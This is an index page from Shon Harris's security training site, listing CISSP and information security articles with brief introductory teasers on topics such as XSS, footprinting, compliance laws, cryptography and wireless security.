Shon Harris and other team members would like to
share with you the CISSP and information security
articles and materials we have published for various
periodicals.
We will continually be updating this page with
more articles, so please check back often. If you
would like to use any of our material, please e-mail
us at
info@logicalsecurity.com for permission
first and please indicate that the material came
from our web site.
Basic Footprinting
Footprinting of an organization prior launching an
attack against its resources is essential for an
attacker as it enhances the probability of a
successful attack. For example, if a burglar plans
to break into a house, he will first gather as much
information as possible to find out the ways that
can be used to break into it. Similarly, when
malicious attacker plans to target an online
resource, he first gathers all the possible
information to create a complete profile of target’s
security posture.
View Article
IT Security Auditors Roles
We have moved into a fascinating time where
technology has been injected into almost every part
of our lives. We are currently going through a
metamorphosis that none of us can truly grasp,
because we are right in the middle of it. It is very
difficult for a society to know that it is going
through great changes because it is hard to view
something objectively when you are right in the
middle of it.
View Article
E-mail Threats
E-mail spoofing is a technique used by malicious
users to forge an e-mail to make it appear to be
from a legitimate source. Usually, such e-mails
appear to be from known and trusted e-mail addresses
when they are actually generated from a malicious
source. This technique is widely used by attackers
these days for spamming and phishing purposes.
View Article
Basic Security Development Issues
Developers are generally not always aware of the
ever increasing security issues that can nefariously
attack their code. This lack of awareness combined
with tight development timelines generally result in
applications that are prone to a wide assortment of
attacks.
View Article
Programming Languages
From the era of punched card instructions to
heuristic encoding, programming languages have
rapidly evolved in their design, approach and dogma.
Though the first three generations of programming
languages can be classified on distinctly defined
precincts, thereon, the classification becomes
slightly obscure and somewhat arguable.
View Article
Web Security Concepts and Attacks
Cross-Site Scripting (XSS) is a kind of application
security vulnerability which is usually found in web
applications. XSS attacks enable an attacker to
inject their malicious code (in client-side
scripting languages, such as JavaScript) into
vulnerable web pages.
View Article
Identity Management
Identity management is a broad and loaded term that
encompasses the use of different products to
identify, authenticate, and authorize users through
automated means. To many people, the term also
includes user account management, access control,
password management, single sign-on functionality,
managing rights and permissions for user accounts,
and auditing and monitoring of all of these items.
The reason that individuals, and companies, have
different definitions and perspectives of identity
management (IdM) is because it is so large and
encompasses so many different technologies and
processes.
View Article
XML Security
If you can remember when HyperText Markup Language
(HTML) was all we had to make a static web page,
you’re old. Being old in the technology world is
different than in the regular world; HTML came out
in the early 1990s. HTML came from Standard
Generalized Markup Language (SGML), which came from
the Generalized Markup Language (GML). We still use
HTML, so it is certainly not dead and gone; the
industry has just improved upon the markup languages
available to use.
View Article
Cross Site Scripting Attacks
Cross Site Scripting (XSS) is a type of web application vulnerability which enables an attacker to inject her malicious code
(usually JavaScript) into vulnerable web pages. When an unsuspecting user visits the infected page, the malicious code executes
on the victim’s browser and may lead to stolen cookies, hijacked sessions, malware execution,
bypassed access control or aid in exploiting browser vulnerabilities.
View Article
Mobile Telephony
Mobile Telephony refers to communication using a mobile wireless technology.
It is usually classified into four generations namely 1G, 2G, 3G and 4G.
These generations help record the dramatic evolution mobile telephony have under gone since their first introduction nearly 30 years ago.
View Article
Enterprise Methodologies
The Information Technology Infrastructure Library (ITIL) is a set of guidelines and techniques that are used to manage,
improve, and organize the design, development and operations of IT infrastructure.
The major focus of the ITIL is on the constant evaluation and improvement of delivered IT services.
View Article
Security Policies
Security
policies provide the foundation for an
organization’s security infrastructure. A security
policy is a document or set of documents that
conveys the management’s intentions and decision on
how security will play a role within the
organization.
View Article
British Standard 7799
The
British Standard 7799 is an internationally
recognized set of recommendations for developing
security policies and conducting auditing. The
standard provides comprehensive guidance on many of
the issues related to information security. Many
organizations use British Standard 7799 as a
baseline to start from when developing their
policies and indeed their information security
programs.
View Article
Who’s Who
Acronyms
for companies and organizations are often used in
literature without an explanation of who these
organizations are and what their function in the
world is. This section covers many of the
organizations that have been discussed in the
All-In-One CISSP Exam Guide.
View Article
Gramm-Leach-Bliley Act
The Gramm-Leach-Bliley
act was signed into United States law by former
President Bill Clinton on November 12, 1999. The act
applies to all national banks and federal branches
of foreign banks that are subject to the supervision
of the Federal Reserve System, Office of Thrift
Supervision (OTS), Comptroller of the Currency (OCC),
or Federal Deposit Insurance Corporation (FDIC). The
act’s main goal is to protect individual private
information.
View Article
Various Networking Components
There are
different flavors, characteristics, and standards
underneath the Ethernet umbrella. This article
describes these different components.
View Article
OMB Circular A-123
Before we
dive into this one, let’s figure out who the OMB is.
Basically this is the group that oversees all
executive branch funding, so when they come down
with a new requirement, government agencies have an
incentive to follow it so that the agencies can
receive funding for the next year.
View Article
Regulation Government Agencies
The
Congress and President of the United States delegate
specific authority to federal government agencies.
Others are created at the state level. Federal
agencies have the authority to create regulations,
to enforce regulations, and to arbitrate disputes.
They typically have dedicated enforcement personnel
who operate regionally.
View Article
An Introduction to Firewalling with iptables and
pf
In this
article we assume the reader knows what a firewall
is and other basic concepts about firewalls, like
the distinction between stateless (static) and
stateful packet filtering. We introduce the reader
to a more technical level, showing how to use two
open source tools, iptables on Linux and pf on
OpenBSD, in a simple case of firewall configuration.
View Article
Passing the Audit
The
Public Company Accounting Oversight Board’s
standards and the secrets you must know before the
audit. Many IT managers and professionals strongly
believe that although Sarbanes-Oxley compliance
places a heavy and ongoing burden on IT operations,
it also leads to better IT governance and more
effective information security. Unfortunately, this
is not true.
View Article
SOX and Internal Controls
The audit
function is, in essence, intended to “check up” on
how a company reports its information, to help
confirm that the company information is reliable.
The mechanisms used by a company to assure the
consistency of its business processes are its
“internal controls.” The “internal controls”
associated with financial reporting are of interest
to auditors, since they help to indicate how much
reliance can be placed on financial information.
View Article
PCI Standards
PCI is
all about credit card system security. The credit
card system plays a critical role in the economy.
The system is built from the bricks of various
technologies, owned and operated by different
parties, mortared together with contracts to form an
impressive structure within which a broad range of
commerce can be conducted.
View Article
GLBA Compliance Challenges
Financial
institutions and others subject to GLBA find three
aspects of compliance particularly challenging:
1) Assessing and managing risk from third-party
vendors.
2) Performing internal risk assessments
3) Monitoring systems and procedures to detect
actual and attempted attacks on or intrusions into
customer information systems.
View Article
A Satire of the Security Divas of Today
I have been in this industry longer than most people I know and work with. At one time I could keep up with technology, which vendors sold what technology, methodologies, tools, and occasionally my socks that attempted to disappear in the black abyss of my clothes washer.
View Article
What Do CISSPs Really Know?
I have been in the "CISSP world" for over 10 years now. I have taught it for 8 years around the world for corporate and government agencies. I have written books on it, developed products, webinars, study materials, etc. Over the years I have noticed that the students who are attempting to achieve their CISSP certification have changed in their approach. Five years ago people studied material on their own for months before attending a CISSP bootcamp course. This is necessary because no one can really learn the extensive material that the CISSP exam covers in just 5 days. Over the last few years, I have seen a real switch in the approach of achieving this credential.
View Article
Handbook of Malicious Code
Malicious
code, or simply Malware, is a new term introduced by
industry, which includes whole range of malicious
and non-malicious code (software) such as viruses,
trojan horses, worms, spywares, adwares, internet
cookies, homepage re-set programs, dialers and
combination of these, known as blended attacks.
Although, each of these has its own definition and
functions, we have witnessed that the malware
writers have used combination of these to create
more deadly and difficult to trace viruses.
View Article
How SSL Works
As you know, virtually all businesses, most government agencies and many individuals now have Web sites, and the number of individuals and companies with Internet access is expanding rapidly. Consequently, businesses are enthusiastic about setting up facilities on the Web for electronic commerce, but the reality is that Internet and the Web are extremely vulnerable to attacks of various sorts, so that the demand for secure for Web services grows.
View Article
The CISSP Exam Is Out of Date, Irrelevant, and Subjective
Busting Through the Myths of the CISSP Exam
For years I have heard people complain about having to learn things for the CISSP exam that they would never use in their life. When I was studying for this exam several years ago, I said the same types of things. I also hear people saying that they have to learn security through (ISC)2's view for this exam, which does not match with reality. The thought on both of these statements is that someone would have to memorize items for the test that are not helpful in their career - thus a waste of time. Again, I fell into this bucket when I studied and took the exam forever ago. Now I see it completely differently.
View Article
Multi-Protocol Label Switching (MPLS)
In recent years, multi-protocol label switching (MPLS) is gaining prominence and many companies are migrating towards it. This is largely due to MPLS is a convergence tool to integrate voice, video and data across a single platform to provide quality of service (QoS), improved performance and reliability, and provide an array of VPN and LAN interconnect services.
View Article
TCP Session Hijacking: the Mitnick Attack
Kevin David Mitnick, also called "Condor", was born in 1963 and became one of the most famous "crackers". He was repeatedly condemned for minor computer related crimes, then his intrusions into big companies ended leading him to prison, where he spent five years (from 1995 to 2000), after a "challenge" against FBI and the security expert Tsutomu Shimomura. Now he runs a computer security consulting company. We don't deal with all aspects of Mitnick's contribution to hacking and cracking (among other things, he made "social engineering", to steal information directly from people, popular), but we focus on an attack he carried out against the California University in Santa Barbara, attack that can be taken as an example, showing various interesting aspects, as it is a complex attack, not made of a single activity.
View Article
Gramm Leach Bliley Act (GLBA)
In this chapter, we will provide an overview of the Gramm Leach Bliley Act, explore the follow-on regulations issued by the various regulators tasked with implementing the Act, and look at several areas of compliance with GLBA that prove particularly challenging to financial organizations. We will also explore some technologies that can help financial institutions to more easily comply with the provisions of GLBA.
View Article
Payment Card Industry (PCI) Data Security Standard
Various credit card companies have had their own security requirements for years that their merchant customers had to abide by to be able to continue to accept and process credit card payments. For example, MasterCard has its Site Data Protection (SDP) program, American Express has its Data Security Operating Policy (DSOP), Discover has its Information Security and Compliance (DISC), and Visa has its Account Information Security (AIS) and Cardholder Information Security Program (CISP).
View Article
Multiservice Access Technologies
Multiservice access technologies combine several types of communication categories (data, voice, and video) over one transmission line. This provides higher performance, reduced operational costs, and greater flexibility, integration, and control for administrators.
View Article
Sarbanes-Oxley Act of 2002 (SOX)
Sadly, SOX like many other regulations was created because some companies were not doing what they were supposed to when it came to disclosing information on the company's financial standing. Some CEOs and CFOs of the past figured out that if they made their company's stock prices go up, then they personally made more money through bonuses, selling their own stocks, and demanding higher salaries.
View Article
Network Scanning Techniques
If you want to get network information on the Internet, the first step is to gather public information that is available visiting specific sites or using certain commands. Typically, you can look for information regarding a certain organization searching on the site of a third party organization offering such a service. This is, of course, absolutely legal.
View Article
An Introduction to Security in Software Development
Software is essentially produced by human beings and so, of course, not perfect but prone to bugs.
Some bugs don't necessarily cause malfunctioning but make the system exposed to attacks, i.e. they are security bugs. According to a rough calculation relating to operating systems, there is about one security bug per 1000 lines in the source code (assuming the programmer is competent in secure coding). Given that operating systems such as Windows or Linux have a number of lines of code that is in the order of some 100 million, they can contain hundreds of thousands of potential security bugs.
View Article
Fundamentals of Asterisk
Open source software (OSS) has achieved a dominant role in the delivery of IP-based content such as web data (Apache) and email (sendmail), and is making serious headway in streaming media (icecast).
View Article
Firewall
A firewall is a portion of hardware and software that works in networked environment to stop unauthorized communications by the security policy. A firewall is a common layer of defense in computing – a barrier to keep malicious intrusions away from your proper computers. It is still the important mechanism for protecting the infrastructure of a company.
View Article
Security Audit
Due to ever-changing government regulations on security-based auditing and compliance requirements being passed in US Congress at each session, it has become necessary for CIOs, system and network administrators to update their skills and knowledge regularly. ISO, the world standards benchmark, is also standardizing global business compliance regulation and quality assurance standards. The US companies and its affiliates in European Union are moving forward to adapt this and other quality standards, largely to make the computer audit trails essential to lessen litigations or legal prosecution.
View Article
3 Attack Vectors: Web Code
So now the infrastructure of your web based application should be up to snuff. Completing that is the 1st step to securing your application. Your infrastructure is the foundation for your system and therefore it must be solid in order to have a strong and secure application that no one will have fear of using due to security flaws.
3 Attack Vectors: DB, OS, Hardware
As discussed previously, with the moving of what used to be internal components out to the “cloud” anything that is not web code can be considered infrastructure. Infrastructure can still be further subdivided into hardware and software if this is needed for those who need to address the risks and vulnerabilities of those subsystems separately.
View Article
3 Attack Vectors: Overview
Most articles will focus on one aspect of web security. Cross site scripting, SQL injection, or web
server vulnerabilities are the main focus of the author. A more holistic approach is to see how all the
different facets come together and how each one holds up the other to secure a web application. The
three vectors that any application can be attacked through are the infrastructure, the web code and the
end points. This series will examine each vector in detail and give suggestions on how to protect each
one. This 1st in the series will take a general overview and subsequent articles will go into more detail.
As the attacks change daily there will be a number of web sites referenced for up to the minute
information.
View Article
VoIP
Voice over Internet Protocol (VoIP) technology converts analogue voice signals into digitized
packets and the recipients get them over data networks. VoIP is another example of Internet has
changed the way we communicate and emergence of convergence where voice, data, video, etc.,
pass through a single medium. It uses existing networks and Internet infrastructure to send
information efficiently and with less cost.
Steps to Better Secure Your Mac
While the Macintosh platform is now becoming the target of the same sort of organized crime that affects Windows users, these attacks are still very limited in scope and in impact. Nonetheless, Mac users cannot afford to be complacent.
Biometrics Defined
Biometrics verifies an individual’s identity by analyzing a unique personal attribute or behavior, which is one of the most effective and accurate methods of verifying identification.
View Article
Malicious Software: Viruses
Malicious software, often abbreviated with the term “malware”, is software designed to
infiltrate or damage a computer system without the owner's informed consent. It can therefore penetrate
the system evading controls.
GBL Suggestions
GBL only deals with customer data, not business to business data. GBL can be over ridden by other laws and regulations because OCC and other agencies cover other types of requirements other than just customer data protection. OCC is there to assess the integrity of the bank, not just protecting customer data.
Access Control Methods
The purpose of this article is to introduce, from a theoretical point of view, the main access control methods, in order to provide a better understanding of methods to reinforce the security policy that are based on these concepts. We'll concentrate above all on Mandatory Access Control.
What the Botnets Are Netting and for Whom
The greatest threat to online and offline businesses today are not terrorists or even cyber-terrorists, but good old fashioned organized crime groups using fancy new tools on the Internet to fleece the unsuspecting public, governments and global corporations. Computer crimes on businesses are increasing at an alarming rate, and the cost of computer crimes, just like other business costs, will always be passed on to the customer.
Introduction to Elliptic Curve Cryptography
The purpose of this article is to introduce the reader to Elliptic Curve Cryptography.
Most of the products and of the standards that use public-key cryptography for encryption and digital signatures use RSA, that is the Rivest-Shamir-Adleman algorithm, based on the difficulty of factoring the product of two large prime numbers, which ensures that calculating the private key from the public one is hard (computationally too expensive).
Introduction to Intrusion Detection Systems
An Intrusion Detection System (IDS) is an important means to protect IT systems from external attacks. IDSs are monitoring systems and they are passive, that is they detect attacks or potential attacks, they can send alert messages, but don't interfere with the monitored system and events.
Base-Rate Fallacy Considerations
In this article Bayesian statistics is applied to Intrusion Detection Systems (IDSs), in particular to false positives and false negatives, that is alarms without real threat and threats undetected by the IDS. What is the relation between false positives and false negatives? Which one is more important? Are they to be minimized in the same way or one more than the other?
What Are the Dangers of Instant Messaging?
Historically, operating systems and many applications have utilized their own authentication
mechanisms to validate a user and grant access to network resources.As the world becomes ever
more integrated, the authentication processes on a network must not only satisfy the security
concerns of identifying the validity of a user to the resource, and vice versa,
SELinux and AppArmor: An Introductory Comparison
In another article, “Hardening Linux Systems in the Application Layer: Why It's Important”, I explained the importance of hardening our Linux systems by reinforcing the security policy in the application layer too. As I said, SELinux is not the only available tool for this purpose.
How VoIP Really Works
Voice over Internet Protocol (VoIP) is a protocol (convention or standard) that governs the the transmission of voice through the Internet or other packet switched networks (networks in which small units of data called packets are routed through a network). In other words, VoIP uses a broadband internet connection, like cable or DSL, for routing telephone calls.
A Family of EAP’s (or Is It a Flock of EAP’s?)
Historically, operating systems and many applications have utilized their own authentication
mechanisms to validate a user and grant access to network resources.As the world becomes ever
more integrated, the authentication processes on a network must not only satisfy the security
concerns of identifying the validity of a user to the resource, and vice versa,
How Do Bots and Botnets Work?
Basically a bot is simply a very sophisticated program which mimics human behavior. Yet they are a definite risk for home computer security online.
Reinforcing the Security Policy of Linux Systems
In my professional life I see that Linux systems, in several cases Red Hat Enterprise/Advanced Linux distributions, are protected at network level, with firewalls and other things, but system administrators often haven't a deep knowledge of application level security,
Back to School: IT Training Services
"Training is always the last thing on the mind of the people with the purse strings, and it's usually the first thing to go when the budget gets cut," says Shon Harris.
View Article
Role Model
Identity management is a critical security challenge, but without viable standards for access control, your best efforts may be just a drop in the bucket.
View Article
Introduction to Security Governance
Security governance is very similar in nature to corporate and IT governance because there is overlapping functionality and goals between the three. All three work within an organizational structure of a company and have the same goals of helping to ensure that the company will survive and thrive – they just each have different focuses.
Corporate governance has to do with how the board of directors and executive management run and control a company. IT governance is how technology is used and managed so that it supports business needs. There are many professional and official sounding definitions of security governance such as the following by the IT Governance Institute in its Board Briefing on IT Governance, 2nd Edition:
View Article
Risk Management Guide
Companies have always had to deal with different types of risk, be it financial, legal, the success of a new product launch or a merger, or the threat of natural disasters. These risks are traditionally treated as silos. The CFO is responsible for understanding and making decisions pertaining to financial risk. The IT department is responsible for the risk of losing data processing capabilities. Legal council is responsible for understanding and managing the company's legal issues. And so on. But this fragmented approach to risk is becoming more dangerous as companies face risks that threaten the company's overall existence. These risks come in the form of noncompliance with government regulations, increasing information security threats, terrorist activities and natural disasters. It is important now more than ever, for companies to develop and maintain a holistic risk management program that coordinates these silos because they all have the same overall goal – to protect the company and its assets.
View Article
Understanding Standards for Risk Management and Compliance
Regulatory requirements are driving companies to look into risk management more than ever before. SOX, HIPAA and GLBA all require risk analysis and management. But organizations looking for a solution can quickly find themselves swimming in a sea of acronyms that includes NIST 800-30, AS/NZS 4360:2004, OCTAVE, COSO and CobiT.
View Article
Risks Associated with Outsourcing
Although outsourcing can greatly reduce labor costs, because countries have different laws, regulations and enforcement motivations, many companies have to deal with a range of unfamiliar issues to ensure their work is secure. For example, in 2002, ...
View Article
Denying Denial-Of-Service
New solutions fight DoS/DDoS by automatically detecting and blocking potential attacks. Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks have been around for years, but with reports that 4,000 DoS attacks are launched each week, it's clear the problem isn't close to being resolved. In fact, in a recent poll of Information Security readers, 90 percent said they remained either "very concerned" or "somewhat concerned" about DoS or DDoS.
View Article
Security Strategies for E-Companies - The Science of Secrets
Cryptology continues to evolve as our need for keeping secrets increases. Cryptology, the science of secure communications, is as old as civilization and the written word. Throughout the ages, everyone from kings to shopkeepers has employed codes to gain a competitive edge, reduce vulnerability, hide their true intentions or revel in the comfort of knowing something that someone else doesn't.
View Article
802.11 Security Shortcomings
Wireless communication has been around for years, but only recently has it ascended to the status of a mainstream communication method. Portable devices (e.g., PDAs, cell phones, laptops) have proliferated, giving mobile users access to email accounts, Internet sites, online banking, and the stock exchange. This proliferation has led to WLAN vendors scurrying to develop proprietary wireless network solutions and application vendors hurrying to code new wireless programs.
View Article
Learning from SQL Slammer
Many people might have heard of the Slammer worm, but few people fully understand the root of the attack. Familiarizing yourself with Slammer's methods can help you evaluate the risk to your environment and prepare for future attacks by similar worms.
View Article
Greater WLAN Security with 802.11i
To improve the standard and close holes in current wireless implementations, IEEE developed the 802.11i Task Group. To address each of the aforementioned flaws, this group has developed a new authentication framework that encompasses several components.
View Article
How 802.11i Addresses WEP's Core Deficiencies
Wired Equivalent Privacy (WEP) contains three core deficiencies. The first deficiency is the use of static encryption keys. The second deficiency is the ineffective use of initialization vectors (IVs). The third deficiency is the lack of packet integrity assurance.
View Article
Vulnerability Mismanagement
The following are seven must-have elements of a successful vulnerability management program. They're not about scanning or applying patches; they're the essentials that will enable you to efficiently and effectively find and remediate vulnerabilities
View Article
To Catch a Thief
Understanding the requirements of bringing the necessary forensics capability in-house and the most popular tools in use today.
View Article
|